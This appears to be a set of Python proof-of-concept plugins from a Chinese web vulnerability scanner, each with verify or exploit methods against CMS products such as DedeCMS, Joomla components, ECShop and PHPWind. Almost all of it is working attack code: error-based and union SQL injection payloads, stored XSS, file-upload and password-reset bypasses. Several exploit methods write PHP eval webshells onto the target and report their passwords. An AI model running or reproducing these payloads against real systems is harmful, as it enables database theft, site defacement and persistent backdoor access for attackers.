def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) vul_url = arg + '/index.php?basePath=http://baidu.com/robots.txt' # 伪造的HTTP头 httphead = { 'Host': 'www.google.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive' } resp = requests.get(vul_url, headers=httphead, timeout=50) # md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.text) # 如果成功匹配到md5('3.1416'),证明漏洞验证成功 if match: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): try: self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) start = '2018-01-01' end = '2018-12-31' datestart = datetime.datetime.strptime(start, '%Y-%m-%d') dateend = datetime.datetime.strptime(end, '%Y-%m-%d') while datestart < dateend: datestart += datetime.timedelta(days=1) payload = datestart.strftime('%Y_%m_%d')[2:10] vul_url = arg + '/Data/Log/' + payload + '.log' response = requests.get(vul_url) if response.status_code == 200 and 'INFO:' in response.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format( target=self.target, name=self.vuln.name, url=vul_url)) break except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) # 访问的地址 exploit = '/index.php?option=com_kunena&func=userlist&search=' # 利用union的方式(计算md5(3.1415)) payload = "%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;" # 构造漏洞利用连接 vulurl = arg+exploit+payload # 自定义的HTTP头 httphead = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive' } # 发送请求 resp = requests.get(url=vulurl, headers=httphead, timeout=50) # 检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488) if '63e1f04640e83605c1d177544a5a0488' in resp.text: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" resp = requests.get(self.target + payload) re_result = re.findall(r'~~~(.*?)~~~', resp.text, re.S | re.I) vulurl1 = "%s/?m=city.getSearch&index=xx" % self.target payload1 = { "key": "xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx" } resp1 = requests.post(vulurl1, data=payload1) re_result1 = re.findall(r'~~~(.*?)~~~', resp1.text, re.S | re.I) if re_result: self.output.report( self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=self.target + payload)) if re_result1: self.output.report( self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=vulurl1)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) payloads = { '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#', '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23', '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa', "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#", "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#" } for payload in payloads: target_url = arg = arg + payload req = requests.get(target_url) if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=target_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payloads = [ '/api/addons/zendcheck.php', '/api/addons/zendcheck52.php', '/api/addons/zendcheck53.php', '/source/plugin/mobile/api/1/index.php', '/source/plugin/mobile/extends/module/dz_digest.php', '/source/plugin/mobile/extends/module/dz_newpic.php', '/source/plugin/mobile/extends/module/dz_newreply.php', '/source/plugin/mobile/extends/module/dz_newthread.php', ] pathinfo = re.compile(r' in <b>(.*)</b> on line') for payload in payloads: verify_url = self.target + payload req = requests.get(verify_url) match = pathinfo.findall(req.text) if match: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_V5.7_ # 先注册一个帐号并登录,然后访问: # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' payload = "/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1" url = self.target + payload r = requests.get(url, cookies=cookies) if 'key=' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 通过查询M3U8的文件格式, 我们可以通过文件内容指定加载的fragment的URL. # exp.m3u8 ''' #EXTM3U #EXT-X-TARGETDURATION:10 #EXTINF:10, http://www.baidu.com/a.ts\")+alert(2))}catch(e){}// ''' payload = "/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8" url = self.target + payload r = requests.get(url) if r.status_code == 200 and 'alert(2)' in r.text: if ('>17<' in r.text) or ('>32<' in r.text): self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config" # 这里的cookie需要登录,后期cookie这里得接受外部的值 headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': self.get_option('cookie') } data = '''id=&flag=add&device_name=%3Cscript%3Ealert%28%27cscan%27%29%3C%2Fscript%3E&api_url=&logo_url=&app_key=''' vul_url = arg + payload # 构造执行存储xss漏洞 response = requests.post(vul_url, headers=headers, data=data) payload2 = "/manager/api_manager.php" vul_url2 = arg + payload2 # 验证xss漏洞是否触发 response2 = requests.get(vul_url2, headers=headers) if response2.status_code == 200 and "<td><script>alert('cscan')</script></td>" in response2.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 首先注册用户,创建专题,记下专题ID。 # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' payload = "/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,md5(c)) from qb_members limit 0,1))),0) %23" url = self.target + payload r = requests.get(url, cookies=cookies) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) vun_url = arg + "/library/editornew/Editor/img_save.asp" data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- ''' r = requests.post(vun_url, data=data) res = r.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', res) if match: verify_url = arg + \ "/library/editornew/Editor/NewImage/"+match.group(1) rg = requests.get(verify_url) if rg.status_code == 200 and "testvul" in rg.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞;\n在该验证过程中上传了文件地址为:{url},请及时删除。'. format(target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的漏洞利用'.format( target=self.target, vuln=self.vuln)) # 生成a-z命名方式的文件 randstr = chr(random.randint(96, 122)) filename_poc = randstr + '.php' payload = "file_put_contents('{filename}','<?php eval($_POST[111]); ?>')".format(filename=filename_poc) self.output.info("随机payload生成成功") payload_base64 = '''{$asd'];assert(base64_decode('%s'));//}xxx''' %base64.b64encode(payload.encode('utf-8')).decode('ascii') self.output.info("使用Base64加密payload") payload_hex = binascii.b2a_hex(payload_base64.encode('utf-8')).decode('ascii') self.output.info("使用十六进制加密payload") refer = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x%s,10-- -";s:2:"id";s:3:"'/*";}''' % payload_hex headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Referer': refer } url_paylpad = self.target + "/user.php?act=login" r = requests.get(url_paylpad,headers=headers) self.output.info("正在进行漏洞利用...") poc_url = self.target + filename_poc post_data = {"111": "echo md5(c);"} r2 = requests.post(poc_url, data=post_data) if '4a8a08f09d37b73795649038408b5f33' in r2.text: self.output.report(self.vuln, '发现{target}存在{name}漏洞,webshell地址:{webshell},密码:111'.format( target=self.target, name=self.vuln.name, webshell=self.target + filename_poc)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # Referer : http://www.wooyun.org/bugs/wooyun-2014-080751 payloads = [ '?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23', '?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23', '?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23' ] for payload in payloads: verify_url = self.target + payload req = requests.get(verify_url) if req.status_code == 200 and "4beed3b9c4a886067de0e3a094246f7" in req.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/extpmsPdtInfo.do?action=list" headers = { 'Content-Length': '234', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': 'http://**.**.**.**:80/zgLoginAction.do', 'Cookie': 'JSESSIONID=A5C98CCF4A7C81CC4A3438C86412A367; rayvwulm=1', 'Host': self.target, 'Connection': 'Keep-alive', 'Accept-Encoding': 'gzip,deflate', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21', 'Accept': '*/*' } data = { 'BRAND': "&CHIP=&CONSUME_GROUP=&input=1&OS=&PDT_TYPE=&searchType=&SKSD=&value(keyword)=1'%22()%26%25<acx><ScRiPt%20>alert(“/Cscan-hyhmnn/”)</ScRiPt>&value(orderByStr)=&value(SALE_PRICE)=&value(SCREEN_SIZE)=&value(select_value)=&value(withPeomote)=" } url = self.target + payload response = requests.get(url, headers=headers, data=data) if "/Cscan-hyhmnn/" in response.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 把Sverification_code改成你的验证码就哦了 verification_code = 'aaaa' # 生成随机注册信息 randstr = 'admin_' + str(random.randint(1, 10000)) payload = '/dede/member/reg_new.php' data = "?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwdok}&email={email}%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','*****@*****.**','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode={verification_code}&agree=".format( userid=randstr, uname=randstr, userpwd=randstr, userpwdok=randstr, email=randstr, verification_code=verification_code) url = self.target + payload r = requests.get(url) if r.status_code == 200 and randstr in r.text and '注册成功' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,已注册会员用户名为:{uname},密码为:{password},请及时删除!' .format(target=self.target, name=self.vuln.name, uname=randstr, passwoed=randstr)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) # 利用的payload(利用的是floor回显报错的方式) payload = "1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\ "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB" # 漏洞页面 exploit = '/index.php?option=com_timereturns&view=timereturns&id=' # 构造访问地址 vulurl = arg + exploit + payload # 自定义的HTTP httphead = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive' } # 尝试访问 resp = requests.get(url=vulurl, headers=httphead, timeout=50) # 检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b) if 'c4ca4238a0b923820dcc509a6f75849b' in resp.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: # 属于验证后台漏洞,所以需要登录并且获取cookie,详情参考对应的PDF self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # this poc need to login, so special cookie for target must be included in http headers. cookie = '' header = {'cookie': 'cookie'} payload = ( "/admin.php?adminjob=apps&admintype=groups_manage&action=argument&keyword=1" + "&ttable=/**/tm ON t.tid=tm.tid LEFT JOIN pw_argument a ON t.tid=" + "a.tid LEFT JOIN pw_colonys c ON a.cyid=c.id WHERE (SELECT 1 FROM (select count(*),concat" + "(floor(rand(0)*2),CONCAT(0x3a,(SELECT md5(233))))a from information_schema.tables group by a)b)%23" ) verify_url = self.target + payload req = requests.get(verify_url, headers=header) if 'e165421110ba03099a1c0393373c5b43' in req.text: #args['success'] = True #args['poc_ret']['vul_url'] = verify_url self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) def getString(res): import re Regular = "Duplicate entry \'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq" Temp = re.search(Regular, res) if Temp != None: Temp = Temp.group(0) return Temp else: return "" try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) payloads = ( '/order.php?id=-@`%27`%20UnIon%20select%20username%20from%20`%23@__admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat((select%20concat(0x7167766571,0x7c,md5(123),0x3a73706c69743a,md5(123),0x7c,0x716b616771)),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`%27`', '/order.php?id=-%40%60%27%60%20AND%20%28SELECT%202598%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7167766571%2C%28SELECT%20MID%28%28IFNULL%28CAST%28concat(0x7c,md5(123)%2C0x3a73706c69743a%2Cmd5(123),0x7c)%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x716b616771%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29and%20id%3D%40%60%27%60' ) for payload in payloads: target = arg + payload headers = {"Cookie": "shoppingcart=a,username=a"} req = requests.get(target, headers=headers) if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞;url={url}'.format( target=self.target, name=self.vuln.name, url=target)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = '/FrogCMS-master/admin/?/page/edit/3' # 首先注册用户。 # 获取cookies cookies = {} raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e' for line in raw_cookies.split(';'): key, value = line.split('=', 1) # 1代表只分一次,得到两个数据 cookies[key] = value #print (cookies) data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close' url = self.target + payload requests.post(url, cookies=cookies, data=data) verify_url = self.target + '/FrogCMS-master/?about_us' r = requests.get(verify_url) if "<script>confirm(1234)</script>" in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target url = url if url[-1] != '/' else url[:-1] payload = ( "/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20" "AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||" "CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN" "%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)" "||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA" ) verify_url = url + payload req = requests.get(verify_url) content = req.text if req.status_code == 500 and 'qczgq1qnoiq' in content: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 先注册一个帐号并登录,然后访问: # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' payload = "/admin.php?c=syscontroller&m=add&post=1" data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123" url = self.target + payload requests.post(url, cookies=cookies, data=data) verify_url = self.target + '/index.php?c=myndtt&m=index' r = requests.get(verify_url) if 'PHP Version' in r.text and 'System' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payloads = [ "/DPMA/FWeb/SPEWeb/Web5/SPEPhotosDetail.aspx?KindSetID=20010&ALBUMID=2011+and+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--", "/DPMA/FWeb/WorkRoomWeb/Web/TeacherPhotosDetail.aspx?TID=3050010135+AND+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--&Album_ID=1075" ] for payload in payloads: verify_url = self.target + payload #code, head, res, errcode, _ = curl.curl2(url) r = requests.get(verify_url) if '81dc9bdb52d04dc20036dbd8313ed055' in r.text: # security_hole(verity_url) self.output.report( self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # __Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0121337 payloads = [ '/VideoDetail.aspx?Guid=111%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--', '/VideoSearchList.aspx?VideoCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--', '/ProductListCategory.aspx?ProductCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--', '/ArticleDetail.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--', '/ArticleDetailNew.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--', '/HelpList.aspx?Guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--' ] for payload in payloads: verify_url = self.target + payload req = requests.get(verify_url) if req.status_code == 200 and "~testvul" in req.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 首先获取token。访问域名 + /dede/tpl.php?action=upload s = requests.session() r = s.get(self.target+'/dede/tpl.php?action=upload') # 获取token p = re.compile( r'<input type="hidden" name="([0-9a-f]+)" value="1" />') if p.findall(r.text): token = p.findall(r.text)[0] s.get( self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token)) verify_url = self.target + '/include/taglib/cscan.lib.php' r = requests.get(verify_url) if 'PHP Version' in r.text and 'System' in r.text: self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
